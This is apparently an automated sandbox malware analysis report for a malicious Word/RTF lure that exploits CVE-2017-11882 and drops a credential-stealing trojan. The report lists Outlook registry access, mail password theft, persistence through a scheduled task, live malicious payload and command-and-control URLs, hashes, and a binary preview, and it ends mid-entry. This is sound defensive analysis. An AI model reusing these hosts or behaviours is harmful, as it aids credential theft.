Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon38892.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: PopPassword		21_2_0040D069
Source: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	Code function: SmtpPassword		21_2_0040D069

Source: Yara match	File source: 21.2.XxENUzWteJXT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.sharon38892.exe.34085e0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.sharon38892.exe.31a30e0.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.XxENUzWteJXT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	33 Exploitation for Client Execution	1 Scripting	1 DLL Side-Loading	21 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	5 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	111 Process Injection	1 Deobfuscate/Decode Files or Information	2 Credentials in Registry	13 System Information Discovery	Remote Desktop Protocol	1 Browser Session Hijacking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	2 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Install Root Certificate	NTDS	1 Process Discovery	Distributed Component Object Model	1 Email Collection	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Masquerading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	31 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	111 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SCB REmittance Advice.doc	42%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\sharon38892.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)	42%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\sharon38892.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Generic

Source	Detection	Scanner	Label
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://kbfvzoboss.bid/alien/fre.php	100%	URL Reputation	malware
http://crl.entrust.net/server1.crl0	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	100%	URL Reputation	malware
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://tempuri.org/DataSet1.xsd	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	100%	URL Reputation	malware
http://alphastand.trade/alien/fre.php	100%	URL Reputation	malware
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://secure.comodo.com/CPS0	0%	URL Reputation	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://universalmovies.top/sharonzx.exe	100%	Avira URL Cloud	phishing
http://rocheholding.top/evie3/five/fre.php	100%	Avira URL Cloud	malware
https://universalmovies.top/	100%	Avira URL Cloud	phishing
https://universalmovies.top/sharonzx.exeoC:	100%	Avira URL Cloud	phishing
http://tempuri.org/registerationDataSet.xsdOAsnanyDentalClinic.Properties.Resources	0%	Avira URL Cloud	safe
https://universalmovies.top/sharonzx.exej	100%	Avira URL Cloud	phishing
https://universalmovies.top/sharonzx.exemmC:	100%	Avira URL Cloud	phishing
rocheholding.top/evie3/five/fre.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
universalmovies.top	104.21.74.191	true	true		unknown
rocheholding.top	188.114.97.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://universalmovies.top/sharonzx.exe	true	Avira URL Cloud: phishing	unknown
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: malware	unknown
rocheholding.top/evie3/five/fre.php	true	Avira URL Cloud: malware	unknown
http://rocheholding.top/evie3/five/fre.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/registerationDataSet.xsdOAsnanyDentalClinic.Properties.Resources	sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr	false	Avira URL Cloud: safe	unknown
https://universalmovies.top/	EQNEDT32.EXE, 00000002.00000002.348345473.000000000061F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://crl.entrust.net/server1.crl0	EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.entrust.net03	EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ibsensoftware.com/	XxENUzWteJXT.exe, XxENUzWteJXT.exe, 00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://universalmovies.top/sharonzx.exeoC:	EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://tempuri.org/DataSet1.xsd	sharon38892.exe, 00000005.00000000.348048744.0000000000862000.00000020.00000001.01000000.00000004.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://universalmovies.top/sharonzx.exej	EQNEDT32.EXE, 00000002.00000002.348345473.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://ocsp.entrust.net0D	EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	sharon38892.exe, 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, XxENUzWteJXT.exe, 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	EQNEDT32.EXE, 00000002.00000002.348345473.0000000000690000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.348345473.0000000000634000.00000004.00000020.00020000.00000000.sdmp, XxENUzWteJXT.exe.5.dr, sharonzx[1].exe.2.dr, sharon38892.exe.2.dr	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	EQNEDT32.EXE, 00000002.00000002.348345473.0000000000656000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://universalmovies.top/sharonzx.exemmC:	EQNEDT32.EXE, 00000002.00000002.348345473.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.96.9	unknown	European Union	13335	CLOUDFLARENETUS	true
104.21.74.191	universalmovies.top	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	rocheholding.top	European Union	13335	CLOUDFLARENETUS	true
188.114.96.3	unknown	European Union	13335	CLOUDFLARENETUS	true
188.114.97.9	unknown	European Union	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1446718
Start date and time:	2024-05-23 20:16:36 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SCB REmittance Advice.doc
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@24/25@100/5
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 97% Number of executed functions: 102 Number of non-executed functions: 15
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
Execution Graph export aborted for target EQNEDT32.EXE, PID 2740 because there are no executed function
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: SCB REmittance Advice.doc

Simulations

Behavior and APIs

Time	Type	Description
11:17:32	Task Scheduler	Run new task: XxENUzWteJXT path: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
14:17:22	API Interceptor	303x Sleep call for process: EQNEDT32.EXE modified
14:17:26	API Interceptor	6597x Sleep call for process: sharon38892.exe modified
14:17:29	API Interceptor	6x Sleep call for process: schtasks.exe modified
14:17:29	API Interceptor	67x Sleep call for process: powershell.exe modified
14:17:33	API Interceptor	37x Sleep call for process: XxENUzWteJXT.exe modified
14:17:33	API Interceptor	193x Sleep call for process: taskeng.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.9	ARRIVAL NOTICE.doc	Get hash	malicious	Lokibot	Browse	spencerstuartllc.top/evie2/five/fre.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	potunulit.org/
	file.exe	Get hash	malicious	SmokeLoader	Browse	potunulit.org/
	file.exe	Get hash	malicious	Djvu, Fabookie, RedLine, SmokeLoader	Browse	potunulit.org/
	file.exe	Get hash	malicious	Djvu, SmokeLoader	Browse	potunulit.org/
	file.exe	Get hash	malicious	Fabookie, SmokeLoader	Browse	potunulit.org/
	file.exe	Get hash	malicious	Djvu, ManusCrypt, SmokeLoader	Browse	potunulit.org/
	file.exe	Get hash	malicious	Djvu, Fabookie, ManusCrypt, RedLine, SmokeLoader	Browse	potunulit.org/
	file.exe	Get hash	malicious	Djvu, Fabookie, ManusCrypt, RedLine, SmokeLoader	Browse	potunulit.org/
	file.exe	Get hash	malicious	Fabookie, RedLine, SmokeLoader	Browse	potunulit.org/
104.21.74.191	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	tuong.me/wp-login.php
188.114.97.3	WRnJsnI1Zq.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	objectiveci.top/pythonpacketGamebigloadprivateCentral.php
	http://hjkie5.pages.dev/	Get hash	malicious	Unknown	Browse	hjkie5.pages.dev/
	56882720_50174358_2024-05-23_203027.xls	Get hash	malicious	Unknown	Browse	qr-in.com/GDKZCby
	Enquiry No. 2421005.xla.xlsx	Get hash	malicious	Unknown	Browse	qr-in.com/atBVKxq
	56882720_50174358_2024-05-23_203027.xls	Get hash	malicious	Unknown	Browse	qr-in.com/GDKZCby
	file.exe	Get hash	malicious	Unknown	Browse	wagner3.net/admin
	Product Listsd#U0334r#U0334o#U0334w#U0334..exe	Get hash	malicious	FormBook	Browse	www.sba99prag.com/pshj/
	ORDIN.xls	Get hash	malicious	Unknown	Browse	qr-in.com/HDYwZbx
	ORDIN.xls	Get hash	malicious	Unknown	Browse	qr-in.com/HDYwZbx
	SSDQ115980924.exe	Get hash	malicious	FormBook	Browse	www.ilodezu.com/z48v/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
rocheholding.top	UMWJhzdI7q.exe	Get hash	malicious	Lokibot	Browse	188.114.96.3
	Request order.doc	Get hash	malicious	Lokibot	Browse	188.114.97.3
	1hoqdSJ4ie.exe	Get hash	malicious	Lokibot	Browse	104.21.65.180
	questionnaire form.doc	Get hash	malicious	Lokibot	Browse	104.21.65.180
	nmHRO64KQK.exe	Get hash	malicious	Lokibot	Browse	172.67.165.74
	4Omlbm5eBA.exe	Get hash	malicious	Lokibot	Browse	104.21.65.180
	Revised PI.doc	Get hash	malicious	Lokibot	Browse	104.21.65.180
	Purchase_Order.doc	Get hash	malicious	Lokibot	Browse	104.21.65.180
	new_order.doc	Get hash	malicious	Lokibot	Browse	104.21.65.180
universalmovies.top	PYR0948.doc	Get hash	malicious	Unknown	Browse	104.21.74.191
	Doc PI.doc	Get hash	malicious	FormBook	Browse	104.21.74.191
	PO051524.doc	Get hash	malicious	Unknown	Browse	104.21.74.191
	Scanned doc 03945.doc	Get hash	malicious	AgentTesla	Browse	104.21.74.191
	GENERALGROUP INV FWDRB42024.doc	Get hash	malicious	Lokibot	Browse	104.21.74.191
	Revised PI.doc	Get hash	malicious	Lokibot	Browse	104.21.74.191
	Signed contract-009988876.doc	Get hash	malicious	Unknown	Browse	104.21.74.191
	PAYMENT SLIP.doc	Get hash	malicious	AgentTesla	Browse	172.67.162.95
	PAYROLL.doc	Get hash	malicious	FormBook	Browse	172.67.162.95
	MOQ010524Purchase order.doc	Get hash	malicious	FormBook	Browse	104.21.74.191

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	V_273686.Lnk.lnk	Get hash	malicious	MalLnk	Browse	172.67.217.192
	kam.cmd	Get hash	malicious	GuLoader	Browse	104.21.28.80
	https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1	Get hash	malicious	Unknown	Browse	104.21.39.66
	https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4	Get hash	malicious	HTMLPhisher	Browse	172.64.154.146
	http://all4promos.com	Get hash	malicious	Unknown	Browse	162.247.243.29
	Doc0781123608.exe	Get hash	malicious	AgentTesla, PureLog Stealer, XWorm	Browse	172.67.74.152
	nv6mqExGOo.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.26.0.5
	PstCgdvsgB.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse	104.26.5.15
	1n4J6tLgsc.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	N35q9x6n9c.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166
CLOUDFLARENETUS	V_273686.Lnk.lnk	Get hash	malicious	MalLnk	Browse	172.67.217.192
	kam.cmd	Get hash	malicious	GuLoader	Browse	104.21.28.80
	https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1	Get hash	malicious	Unknown	Browse	104.21.39.66
	https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4	Get hash	malicious	HTMLPhisher	Browse	172.64.154.146
	http://all4promos.com	Get hash	malicious	Unknown	Browse	162.247.243.29
	Doc0781123608.exe	Get hash	malicious	AgentTesla, PureLog Stealer, XWorm	Browse	172.67.74.152
	nv6mqExGOo.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.26.0.5
	PstCgdvsgB.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse	104.26.5.15
	1n4J6tLgsc.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	N35q9x6n9c.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166
CLOUDFLARENETUS	V_273686.Lnk.lnk	Get hash	malicious	MalLnk	Browse	172.67.217.192
	kam.cmd	Get hash	malicious	GuLoader	Browse	104.21.28.80
	https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1	Get hash	malicious	Unknown	Browse	104.21.39.66
	https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4	Get hash	malicious	HTMLPhisher	Browse	172.64.154.146
	http://all4promos.com	Get hash	malicious	Unknown	Browse	162.247.243.29
	Doc0781123608.exe	Get hash	malicious	AgentTesla, PureLog Stealer, XWorm	Browse	172.67.74.152
	nv6mqExGOo.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.26.0.5
	PstCgdvsgB.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse	104.26.5.15
	1n4J6tLgsc.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	N35q9x6n9c.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166
CLOUDFLARENETUS	V_273686.Lnk.lnk	Get hash	malicious	MalLnk	Browse	172.67.217.192
	kam.cmd	Get hash	malicious	GuLoader	Browse	104.21.28.80
	https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1	Get hash	malicious	Unknown	Browse	104.21.39.66
	https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4	Get hash	malicious	HTMLPhisher	Browse	172.64.154.146
	http://all4promos.com	Get hash	malicious	Unknown	Browse	162.247.243.29
	Doc0781123608.exe	Get hash	malicious	AgentTesla, PureLog Stealer, XWorm	Browse	172.67.74.152
	nv6mqExGOo.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.26.0.5
	PstCgdvsgB.exe	Get hash	malicious	LummaC, RisePro Stealer	Browse	104.26.5.15
	1n4J6tLgsc.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	N35q9x6n9c.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
7dcce5b76c8b17472d024758970a406b	948209184.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.74.191
	documentos.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.74.191
	Inventory_Analysis.xls	Get hash	malicious	Unknown	Browse	104.21.74.191
	Inventory_Analysis.xls	Get hash	malicious	Unknown	Browse	104.21.74.191
	PYR0948.doc	Get hash	malicious	Unknown	Browse	104.21.74.191
	New Order.doc	Get hash	malicious	FormBook	Browse	104.21.74.191
	ORDER FB8190311.doc	Get hash	malicious	Lokibot	Browse	104.21.74.191
	1080.xls	Get hash	malicious	Unknown	Browse	104.21.74.191
	20240403_Oferta factory..xls	Get hash	malicious	Unknown	Browse	104.21.74.191
	Sipari#U015f detaylar#U0131.xls	Get hash	malicious	Unknown	Browse	104.21.74.191

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharonzx[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	771592
Entropy (8bit):	6.706936119730989
Encrypted:	false
SSDEEP:	12288:D8pBoyWPiDu5FJs+NWK6V2D3BTwpR1NkltlkR:D8pBoyUiDu5Fy+R6V2DBTwTHYtY
MD5:	0B67ADEB422396C047E87FA78A9E8E80
SHA1:	0C2BDCFAF8480CFBDC74130E77167280193040D2
SHA-256:	66E4C065666FC203EFEC41F2AC9FB171F0AD5DA06C1830458FF2642EA64E789F
SHA-512:	D0299C1FC4098519285D624879E220F494F9D137BFCAEA9ABC4D7214C238228B676F5CF99FA9630E244457910FB7BD204131E8E37C356A25432690FBC3789371
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F................0.............n.... ........@.. ....................................@.....................................O........................6..........$...p............................................ ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................O.......H........e..t...........4Z...+...........................................0..L.........}.....(.......(......(............s......( ....o!.....("....o#.....($.....0............}........(%........(&.....,5...(............s......(.....o!.....(.....o#....85....r...p.S...('...o(...tS.......()..........9.....s.........s...s+...o,......o ...r...po-..........,$..( .....o ...r...po-...sO...o.........o/...(0.......o1...(2.......o3...(4.......o5...(6.......o7...(8.......o9...(:.........

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2AE73913-93B1-471C-89DC-6B3BEDA4951E}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	CE338FE6899778AACFC28414F2D9498B
SHA1:	897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
SHA-256:	4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
SHA-512:	6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2418F8AC-8D83-4745-9879-3A9BB2FC151A}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
